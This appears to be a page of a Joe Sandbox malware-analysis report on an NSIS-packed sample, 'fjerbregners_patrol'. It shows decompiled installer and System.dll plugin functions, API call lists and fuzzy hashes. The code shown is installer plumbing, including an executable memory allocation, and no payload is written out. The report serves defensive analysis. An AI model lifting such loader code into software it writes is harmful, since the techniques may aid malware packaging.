                                                                                                                                                                                            0x0040320e
                                                                                                                                                                                            0x0040320e
                                                                                                                                                                                            0x00403214
                                                                                                                                                                                            0x0040321c
                                                                                                                                                                                            0x0040321c

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • DestroyWindow.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040320E
                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 0040322F
                                                                                                                                                                                            • wsprintfA.USER32 ref: 0040325E
                                                                                                                                                                                              • Part of subcall function 00405BA4: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll,00000000,C:\Users\user\Desktop,?,00000000), ref: 00405BD9
                                                                                                                                                                                              • Part of subcall function 00405BA4: lstrlenA.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll,00000000,C:\Users\user\Desktop,?,00000000), ref: 00405BE9
                                                                                                                                                                                              • Part of subcall function 00405BA4: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll,00000000,C:\Users\user\Desktop,?,00000000), ref: 00405C02
                                                                                                                                                                                              • Part of subcall function 00405BA4: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll), ref: 00405C1D
                                                                                                                                                                                              • Part of subcall function 00405BA4: SendMessageA.USER32 ref: 00405C47
                                                                                                                                                                                              • Part of subcall function 00405BA4: SendMessageA.USER32(000203D0,00001007,00000000,?), ref: 00405C64
                                                                                                                                                                                              • Part of subcall function 00405BA4: SendMessageA.USER32(000203D0,00001013,00000000,00000000), ref: 00405C72
                                                                                                                                                                                            • CreateDialogParamA.USER32(0000006F,00000000,00403553,00000000), ref: 00403285
                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403293
                                                                                                                                                                                              • Part of subcall function 004031DA: MulDiv.KERNEL32(0000279E,00000064,0000279E), ref: 004031F1
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                                                                            • String ID: ... %d%%
                                                                                                                                                                                            • API String ID: 722711167-2449383134
                                                                                                                                                                                            • Opcode ID: 536a388a55b8cc03fc305fda1c510ba8367e4bc1c3957915db189a25f608e8a5
                                                                                                                                                                                            • Instruction ID: 77b0c724521cb84a79a419565f8a9389a55f637b3f4f6fc8a184593b37386229
                                                                                                                                                                                            • Opcode Fuzzy Hash: 536a388a55b8cc03fc305fda1c510ba8367e4bc1c3957915db189a25f608e8a5
                                                                                                                                                                                            • Instruction Fuzzy Hash: EE011B70640605ABDB20AF64EE0AB5A3AACF74070EF1444BEE601F51E1DBB89584CA6D
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0040555F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45windowCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E0040555F(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t18;
				unsigned int _t22;
				signed int _t28;

				_t18 = SendMessageA(_a4, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t18;
					_v60 = 4;
					SendMessageA(_a4, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t22 = GetMessagePos();
				_v16 = _t22 >> 0x10;
				_v20 = _t22;
				ScreenToClient(_a4,  &_v20);
				_t28 = SendMessageA(_a4, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t18 = _v8;
					goto L4;
				}
				return _t28 | 0xffffffff;
			}













                                                                                                                                                                                            0x00405578
                                                                                                                                                                                            0x0040557e
                                                                                                                                                                                            0x004055be
                                                                                                                                                                                            0x004055be
                                                                                                                                                                                            0x004055cf
                                                                                                                                                                                            0x004055d6
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004055d8
                                                                                                                                                                                            0x00405580
                                                                                                                                                                                            0x0040558d
                                                                                                                                                                                            0x00405597
                                                                                                                                                                                            0x0040559a
                                                                                                                                                                                            0x004055ae
                                                                                                                                                                                            0x004055b4
                                                                                                                                                                                            0x004055bb
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004055bb
                                                                                                                                                                                            0x00000000

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00405578
                                                                                                                                                                                            • GetMessagePos.USER32 ref: 00405580
                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 0040559A
                                                                                                                                                                                            • SendMessageA.USER32(?,00001111,00000000,?), ref: 004055AE
                                                                                                                                                                                            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004055D6
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                                                                                                            • String ID: f
                                                                                                                                                                                            • API String ID: 41195575-1993550816
                                                                                                                                                                                            • Opcode ID: dd23048b3aa73c0a39ee7e956cec9164103b80945464f2d67001f9a809c24fa3
                                                                                                                                                                                            • Instruction ID: dcbed95cee1b9a22bee0894e53422ce58258fa0842e337ef8c94dc08d18d779a
                                                                                                                                                                                            • Opcode Fuzzy Hash: dd23048b3aa73c0a39ee7e956cec9164103b80945464f2d67001f9a809c24fa3
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4A01257190020DBBEB119BA4CD85BEEBBB9FF04720F10412AFA41BA2D0C7B49A41CF54
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00403553 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E00403553(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t10;

				if(_a8 != 0x110) {
					if(_a8 == 0x113) {
						goto L3;
					}
				} else {
					SetTimer(_a4, "true", 0xfa, 0);
					L3:
					_t10 = E004031DA();
					_t12 =  ==  ? "verifying installer: %d%%" : "unpacking data: %d%%";
					wsprintfA( &_v68,  ==  ? "verifying installer: %d%%" : "unpacking data: %d%%", _t10);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}





                                                                                                                                                                                            0x00403560
                                                                                                                                                                                            0x0040357d
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403562
                                                                                                                                                                                            0x0040356e
                                                                                                                                                                                            0x0040357f
                                                                                                                                                                                            0x0040357f
                                                                                                                                                                                            0x00403596
                                                                                                                                                                                            0x0040359e
                                                                                                                                                                                            0x004035ae
                                                                                                                                                                                            0x004035c0
                                                                                                                                                                                            0x004035c0
                                                                                                                                                                                            0x004035c8

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • SetTimer.USER32(?,?,000000FA,00000000), ref: 0040356E
                                                                                                                                                                                            • wsprintfA.USER32 ref: 0040359E
                                                                                                                                                                                            • SetWindowTextA.USER32(?,?), ref: 004035AE
                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,00000406,?), ref: 004035C0
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                                                                            • API String ID: 1451636040-1158693248
                                                                                                                                                                                            • Opcode ID: 9c254db37c4599e0f8403c5463c7017a92e01a249563db49ca19fc5feeb4b824
                                                                                                                                                                                            • Instruction ID: b84c964c24c06a6d1b0ed427829e45d371115c78694da09de91b6e4906ddcae9
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c254db37c4599e0f8403c5463c7017a92e01a249563db49ca19fc5feeb4b824
                                                                                                                                                                                            • Instruction Fuzzy Hash: 89F03170500109FADF20AF50DD06FAE3A6CAB00305F00803EFA46F51E1DBB89A559B9D
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 6EE81F58 Relevance: 9.1, APIs: 6, Instructions: 134memoryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                                                            			E6EE81F58(void* _a4) {
				signed int _v4;
				signed int _v8;
				signed int _t46;
				void* _t47;
				signed int _t48;
				void* _t49;
				void* _t52;
				void* _t56;
				signed int _t57;
				signed int _t59;
				void* _t60;

				_t52 = _a4;
				_t46 = 0 |  *((intOrPtr*)(_t52 + 0x814)) > 0x00000000;
				while(1) {
					_v8 = _t46;
					_t59 = _t46 << 5;
					_t60 =  *(_t59 + _t52 + 0x830);
					if(_t60 == 0 || _t60 == 0x1a) {
						goto L8;
					}
					if(_t60 != 0xffffffff) {
						_t51 = _t60 - 1;
						if(_t60 - 1 > 0x18) {
							 *(_t59 + _t52 + 0x830) = 0x1a;
							L11:
							_t56 = _t59 + _t52;
							if( *((intOrPtr*)(_t59 + _t52 + 0x81c)) >= 0) {
							}
							_t48 =  *(_t59 + _t52 + 0x818) & 0x000000ff;
							 *(_t59 + _t52 + 0x834) =  *(_t59 + _t52 + 0x834) & 0x00000000;
							_v4 = _t48;
							if(_t48 > 7) {
								L28:
								_t49 = GlobalFree(_t60);
								_t57 = _v8;
								if(_t57 == 0) {
									return _t49;
								}
								_t55 =  !=  ? _t57 + 1 : 0;
								_t46 =  !=  ? _t57 + 1 : 0;
								continue;
							} else {
								switch( *((intOrPtr*)(_t48 * 4 +  &M6EE82108))) {
									case 0:
										 *(_t56 + 0x820) =  *(_t56 + 0x820) & 0x00000000;
										goto L28;
									case 1:
										_push(__esi);
										__eax = E6EE81326();
										_pop(__ecx);
										goto L18;
									case 2:
										_push(__esi);
										__eax = E6EE81326();
										_pop(__ecx);
										 *__ebp = __eax;
										_a4 = __edx;
										goto L28;
									case 3:
										__eax = E6EE812AF(__esi);
										goto L21;
									case 4:
										 *0x6ee85040 =  *0x6ee85040 +  *0x6ee85040;
										__eax = GlobalAlloc(0x40,  *0x6ee85040 +  *0x6ee85040);
										__ecx =  *0x6ee85040;
										_a4 = __eax;
										__eax = MultiByteToWideChar(0, 0, __esi,  *0x6ee85040, __eax,  *0x6ee85040);
										if(_v4 != 5) {
											__eax = _a4;
											L21:
											 *(__edi + __ebx + 0x834) = __eax;
											L18:
											 *__ebp = __eax;
											goto L28;
										}
										__eax = GlobalAlloc(0x40, 0x10);
										 *(__edi + __ebx + 0x834) = __eax;
										__edi = _a4;
										_push(__eax);
										_push(__edi);
										 *__ebp = __eax;
										__imp__CLSIDFromString();
										__eax = GlobalFree(__edi);
										goto L28;
									case 5:
										if( *__esi != 0) {
											_push(__esi);
											__eax = E6EE81326();
											 *(__edi + __ebx + 0x820) = __eax;
										}
										goto L28;
									case 6:
										 *(__edi + __ebx + 0x830) =  *(__edi + __ebx + 0x830) - 1;
										__ecx = ( *(__edi + __ebx + 0x830) - 1) *  *0x6ee85040;
										__ecx = ( *(__edi + __ebx + 0x830) - 1) *  *0x6ee85040 +  *0x6ee85038;
										_push(__ecx);
										__eax = __ecx + 0xc;
										 *(__edx + 0x820) = __eax;
										asm("cdq");
										_push(__edx);
										_push(__eax);
										__eax = E6EE8144D(__ecx);
										__esp = __esp + 0xc;
										goto L28;
								}
							}
						}
						_t47 = E6EE814E2(_t51);
						L9:
						L10:
						_t60 = _t47;
						goto L11;
					}
					_t47 = E6EE8152B();
					goto L10;
					L8:
					_t47 = E6EE812AF(0x6ee840c7);
					goto L9;
				}
			}














                                                                                                                                                                                            0x6ee81f5b
                                                                                                                                                                                            0x6ee81f6a
                                                                                                                                                                                            0x6ee81f6d
                                                                                                                                                                                            0x6ee81f6f
                                                                                                                                                                                            0x6ee81f73
                                                                                                                                                                                            0x6ee81f76
                                                                                                                                                                                            0x6ee81f7f
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81f89
                                                                                                                                                                                            0x6ee81f92
                                                                                                                                                                                            0x6ee81f98
                                                                                                                                                                                            0x6ee81fa2
                                                                                                                                                                                            0x6ee81fbc
                                                                                                                                                                                            0x6ee81fc4
                                                                                                                                                                                            0x6ee81fc7
                                                                                                                                                                                            0x6ee81fc7
                                                                                                                                                                                            0x6ee81fd7
                                                                                                                                                                                            0x6ee81fdf
                                                                                                                                                                                            0x6ee81fe7
                                                                                                                                                                                            0x6ee81fee
                                                                                                                                                                                            0x6ee820dc
                                                                                                                                                                                            0x6ee820dd
                                                                                                                                                                                            0x6ee820e3
                                                                                                                                                                                            0x6ee820e9
                                                                                                                                                                                            0x6ee82106
                                                                                                                                                                                            0x6ee82106
                                                                                                                                                                                            0x6ee820f6
                                                                                                                                                                                            0x6ee820f9
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81ff4
                                                                                                                                                                                            0x6ee81ff4
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81ffb
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee82007
                                                                                                                                                                                            0x6ee82008
                                                                                                                                                                                            0x6ee8200d
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee82016
                                                                                                                                                                                            0x6ee82017
                                                                                                                                                                                            0x6ee8201c
                                                                                                                                                                                            0x6ee8201d
                                                                                                                                                                                            0x6ee82020
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee82029
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee8203d
                                                                                                                                                                                            0x6ee82042
                                                                                                                                                                                            0x6ee82048
                                                                                                                                                                                            0x6ee82056
                                                                                                                                                                                            0x6ee8205a
                                                                                                                                                                                            0x6ee82065
                                                                                                                                                                                            0x6ee82090
                                                                                                                                                                                            0x6ee8202f
                                                                                                                                                                                            0x6ee8202f
                                                                                                                                                                                            0x6ee8200e
                                                                                                                                                                                            0x6ee8200e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee8200e
                                                                                                                                                                                            0x6ee8206b
                                                                                                                                                                                            0x6ee82071
                                                                                                                                                                                            0x6ee82078
                                                                                                                                                                                            0x6ee8207c
                                                                                                                                                                                            0x6ee8207d
                                                                                                                                                                                            0x6ee8207e
                                                                                                                                                                                            0x6ee82081
                                                                                                                                                                                            0x6ee82088
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee82099
                                                                                                                                                                                            0x6ee8209b
                                                                                                                                                                                            0x6ee8209c
                                                                                                                                                                                            0x6ee820a9
                                                                                                                                                                                            0x6ee820a9
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee820b9
                                                                                                                                                                                            0x6ee820ba
                                                                                                                                                                                            0x6ee820c1
                                                                                                                                                                                            0x6ee820c7
                                                                                                                                                                                            0x6ee820c8
                                                                                                                                                                                            0x6ee820cb
                                                                                                                                                                                            0x6ee820d1
                                                                                                                                                                                            0x6ee820d2
                                                                                                                                                                                            0x6ee820d3
                                                                                                                                                                                            0x6ee820d4
                                                                                                                                                                                            0x6ee820d9
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81ff4
                                                                                                                                                                                            0x6ee81fee
                                                                                                                                                                                            0x6ee81f9b
                                                                                                                                                                                            0x6ee81fb9
                                                                                                                                                                                            0x6ee81fba
                                                                                                                                                                                            0x6ee81fba
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81fba
                                                                                                                                                                                            0x6ee81f8b
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81faf
                                                                                                                                                                                            0x6ee81fb4
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81fb4

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 6EE820DD
                                                                                                                                                                                              • Part of subcall function 6EE812AF: lstrcpynA.KERNEL32(00000000,?,6EE81502,?,6EE811C4,-000000A0), ref: 6EE812BF
                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 6EE82042
                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 6EE8205A
                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000010), ref: 6EE8206B
                                                                                                                                                                                            • CLSIDFromString.OLE32(00000000,00000000), ref: 6EE82081
                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 6EE82088
                                                                                                                                                                                              • Part of subcall function 6EE81958: VirtualAlloc.KERNEL32(00000000,00000010,00001000,00000040,?,6EE820A7,00000000,?), ref: 6EE8198A
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3719184787.000000006EE81000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EE80000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3719111901.000000006EE80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3719267839.000000006EE84000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3719390298.000000006EE86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6ee80000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Global$Alloc$Free$ByteCharFromMultiStringVirtualWidelstrcpyn
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 506890080-0
                                                                                                                                                                                            • Opcode ID: 8ed4151cc90350892d6741845a4ebf05fd7da959ff76637c9538fe43db5819f9
                                                                                                                                                                                            • Instruction ID: 93a2d3c17e646bd55aba9bdcd02aca4d9aa0d5786c57eb4dae17ebc64b3b882a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ed4151cc90350892d6741845a4ebf05fd7da959ff76637c9538fe43db5819f9
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0941D071405602EFD7059FE8D844BEBB7E8FF46305F24862EE85C8B249DB305949CBA2
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 6EE810C6 Relevance: 8.9, APIs: 7, Instructions: 155memoryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E6EE810C6(void* _a8, intOrPtr _a12, void* _a16, intOrPtr _a20) {
				signed int _v0;
				void _t29;
				void* _t30;
				void* _t36;
				void* _t43;
				intOrPtr _t52;
				void* _t56;
				void* _t62;
				void* _t63;
				void _t66;
				void* _t67;
				void* _t74;
				signed int _t75;
				void* _t79;
				void* _t80;
				void* _t82;
				signed int _t83;
				void* _t85;
				void _t88;
				void _t89;
				void* _t90;
				void* _t92;
				void* _t94;

				 *0x6ee85040 = _a8;
				 *0x6ee8503c = _a16;
				 *0x6ee85038 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x6ee85014, E6EE812F7, _t79, _t82);
				_t83 =  *0x6ee85040 * 0x14;
				_v0 = _t83;
				_t90 = E6EE8152B();
				_a8 = _t90;
				_t80 = _t90;
				_t66 = _v0;
				if(_t66 == 0) {
					L28:
					return GlobalFree(_t90);
				}
				do {
					_t29 = _t66;
					_t80 = _t80 + 1;
					_t94 = _t29 - 0x66;
					if(_t94 > 0) {
						_t30 = _t29 - 0x6c;
						if(_t30 == 0) {
							L24:
							_t31 =  *0x6ee85010;
							if( *0x6ee85010 != 0) {
								E6EE812FA( *0x6ee85038, _t31 + 4, _t83);
								_t67 =  *0x6ee85010;
								_t92 = _t92 + 0xc;
								 *0x6ee85010 =  *_t67;
								GlobalFree(_t67);
							}
							goto L26;
						}
						_t36 = _t30 - 4;
						if(_t36 == 0) {
							L15:
							GlobalFree(E6EE8157E(E6EE814E2( *_t80 - 0x30)));
							_t80 = _t80 + 1;
							goto L26;
						}
						_t43 = _t36;
						if(_t43 == 0) {
							L13:
							GlobalFree(E6EE815C7( *_t80 - 0x30, E6EE8152B()));
							_t80 = _t80 + 1;
							L11:
							_t83 = _v0;
							goto L26;
						}
						L8:
						if(_t43 != 1) {
							goto L26;
						}
						_t88 = GlobalAlloc(0x40, _t83 + 4);
						_t11 = _t88 + 4; // 0x4
						E6EE812FA(_t11,  *0x6ee85038, _v0);
						 *_t88 =  *0x6ee85010;
						 *0x6ee85010 = _t88;
						L10:
						_t92 = _t92 + 0xc;
						goto L11;
					}
					if(_t94 == 0) {
						_t74 =  *0x6ee8503c;
						_t85 =  *_t74;
						 *_t74 =  *_t85;
						_t75 = _v0;
						_t52 =  *((intOrPtr*)(_t75 + 0xc));
						_a12 = _t52;
						if( *((char*)(_t85 + 4)) == 0x1e) {
							E6EE812FA(_t75, _t85 + 6, 0x38);
							_t75 = _v0;
							_t92 = _t92 + 0xc;
							_t52 = _a12;
						}
						 *((intOrPtr*)(_t75 + 0xc)) = _t52;
						GlobalFree(_t85);
						goto L11;
					}
					_t56 = _t29 - 0x46;
					if(_t56 == 0) {
						_t89 = GlobalAlloc(0x40,  *0x6ee85040 + 8);
						 *((intOrPtr*)(_t89 + 4)) = 0x1e;
						_t14 = _t89 + 6; // 0x6
						E6EE812FA(_t14, _v0, 0x38);
						 *_t89 =  *( *0x6ee8503c);
						 *( *0x6ee8503c) = _t89;
						goto L10;
					}
					_t62 = _t56 - 6;
					if(_t62 == 0) {
						goto L24;
					}
					_t63 = _t62 - 4;
					if(_t63 == 0) {
						 *_t80 =  *_t80 + 0xa;
						goto L15;
					}
					_t43 = _t63;
					if(_t43 == 0) {
						 *_t80 =  *_t80 + 0xa;
						goto L13;
					}
					goto L8;
					L26:
					_t66 =  *_t80;
				} while (_t66 != 0);
				_t90 = _a8;
				goto L28;
			}


























                                                                                                                                                                                            0x6ee810cc
                                                                                                                                                                                            0x6ee810d6
                                                                                                                                                                                            0x6ee810e0
                                                                                                                                                                                            0x6ee810f4
                                                                                                                                                                                            0x6ee810f7
                                                                                                                                                                                            0x6ee810fe
                                                                                                                                                                                            0x6ee8110d
                                                                                                                                                                                            0x6ee8110f
                                                                                                                                                                                            0x6ee81113
                                                                                                                                                                                            0x6ee81115
                                                                                                                                                                                            0x6ee8111a
                                                                                                                                                                                            0x6ee812a7
                                                                                                                                                                                            0x6ee812ae
                                                                                                                                                                                            0x6ee812ae
                                                                                                                                                                                            0x6ee81124
                                                                                                                                                                                            0x6ee81124
                                                                                                                                                                                            0x6ee81127
                                                                                                                                                                                            0x6ee81128
                                                                                                                                                                                            0x6ee8112b
                                                                                                                                                                                            0x6ee81250
                                                                                                                                                                                            0x6ee81253
                                                                                                                                                                                            0x6ee8126d
                                                                                                                                                                                            0x6ee8126d
                                                                                                                                                                                            0x6ee81274
                                                                                                                                                                                            0x6ee81281
                                                                                                                                                                                            0x6ee81286
                                                                                                                                                                                            0x6ee8128c
                                                                                                                                                                                            0x6ee81292
                                                                                                                                                                                            0x6ee81297
                                                                                                                                                                                            0x6ee81297
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81274
                                                                                                                                                                                            0x6ee81255
                                                                                                                                                                                            0x6ee81258
                                                                                                                                                                                            0x6ee811b8
                                                                                                                                                                                            0x6ee811cd
                                                                                                                                                                                            0x6ee811cf
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee811cf
                                                                                                                                                                                            0x6ee8125f
                                                                                                                                                                                            0x6ee81262
                                                                                                                                                                                            0x6ee8119b
                                                                                                                                                                                            0x6ee811b0
                                                                                                                                                                                            0x6ee811b2
                                                                                                                                                                                            0x6ee8118f
                                                                                                                                                                                            0x6ee8118f
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee8118f
                                                                                                                                                                                            0x6ee81154
                                                                                                                                                                                            0x6ee81157
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee8116d
                                                                                                                                                                                            0x6ee81175
                                                                                                                                                                                            0x6ee81179
                                                                                                                                                                                            0x6ee81184
                                                                                                                                                                                            0x6ee81186
                                                                                                                                                                                            0x6ee8118c
                                                                                                                                                                                            0x6ee8118c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee8118c
                                                                                                                                                                                            0x6ee81131
                                                                                                                                                                                            0x6ee81213
                                                                                                                                                                                            0x6ee81219
                                                                                                                                                                                            0x6ee8121d
                                                                                                                                                                                            0x6ee81223
                                                                                                                                                                                            0x6ee81226
                                                                                                                                                                                            0x6ee81229
                                                                                                                                                                                            0x6ee8122d
                                                                                                                                                                                            0x6ee81236
                                                                                                                                                                                            0x6ee8123b
                                                                                                                                                                                            0x6ee8123e
                                                                                                                                                                                            0x6ee81241
                                                                                                                                                                                            0x6ee81241
                                                                                                                                                                                            0x6ee81246
                                                                                                                                                                                            0x6ee81249
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81249
                                                                                                                                                                                            0x6ee81137
                                                                                                                                                                                            0x6ee8113a
                                                                                                                                                                                            0x6ee811e6
                                                                                                                                                                                            0x6ee811ea
                                                                                                                                                                                            0x6ee811f1
                                                                                                                                                                                            0x6ee811f8
